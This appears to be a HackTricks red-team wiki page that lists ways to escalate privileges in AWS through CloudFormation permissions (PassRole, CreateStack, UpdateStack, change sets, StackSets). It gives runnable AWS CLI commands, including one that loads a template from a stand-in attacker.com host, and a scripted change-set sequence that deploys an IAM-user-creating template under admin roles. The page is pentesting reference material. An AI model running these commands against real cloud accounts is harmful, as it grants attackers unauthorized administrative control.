# AWS - Cloudformation Privesc

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## cloudformation

For more information about cloudformation check:

{% content-ref url="../../aws-services/aws-cloudformation-and-codestar-enum.md" %}
[aws-cloudformation-and-codestar-enum.md](../../aws-services/aws-cloudformation-and-codestar-enum.md)
{% endcontent-ref %}

### `iam:PassRole`, `cloudformation:CreateStack`

An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template, hosted on their server, to **execute actions under the permissions of a specified role:**

```bash
aws cloudformation create-stack --stack-name <stack-name> \
    --template-url http://attacker.com/attackers.template \
    --role-arn <arn-role>
```

In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**:

{% content-ref url="iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md" %}
[iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md](iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md)
{% endcontent-ref %}

**Potential Impact:** Privesc to the cloudformation service role specified.

### `iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`)

In this case you can a**buse an existing cloudformation stack** to update it and escalate privileges as in the previous scenario:

```bash
aws cloudformation update-stack \
    --stack-name privesc \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
    --capabilities CAPABILITY_IAM \
    --region eu-west-1 
```

The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.

**Potential Impact:** Privesc to the cloudformation service role specified.

### `cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`

If you have this permission but **no `iam:PassRole`** you can still **update the stacks** used and abuse the **IAM Roles they have already attached**. Check the previous section for exploit example (just don't indicate any role in the update).

The `cloudformation:SetStackPolicy` permission can be used to **give yourself `UpdateStack` permission** over a stack and perform the attack.

**Potential Impact:** Privesc to the cloudformation service role already attached.

### `iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)

An attacker with permissions to **pass a role and create & execute a ChangeSet** can **create/update a new cloudformation stack abuse the cloudformation service roles** just like with the CreateStack or UpdateStack.

The following exploit is a **variation of the**[ **CreateStack one**](./#iam-passrole-cloudformation-createstack) using the **ChangeSet permissions** to create a stack.

```bash
aws cloudformation create-change-set \
    --stack-name privesc \
    --change-set-name privesc \
    --change-set-type CREATE \
    --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
    --role arn:aws:iam::947247140022:role/CloudFormationAdmin \
    --capabilities CAPABILITY_IAM \
    --region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
    --change-set-name privesc \
    --stack-name privesc \
    --region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
    --stack-name privesc \
    --region eu-west-1
```

The `cloudformation:SetStackPolicy` permission can be used to **give yourself `ChangeSet` permissions** over a stack and perform the attack.

**Potential Impact:** Privesc to cloudformation service roles.

### (`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)

This is like the previous method without passing **IAM roles**, so you can just **abuse already attached ones**, just modify the parameter:

```
--change-set-type UPDATE
```

**Potential Impact:** Privesc to the cloudformation service role already attached.

### `iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`)

An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles.

**Potential Impact:** Privesc to cloudformation service roles.

### `cloudformation:UpdateStackSet`

An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles.

**Potential Impact:** Privesc to the attached cloudformation roles.

## References

* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}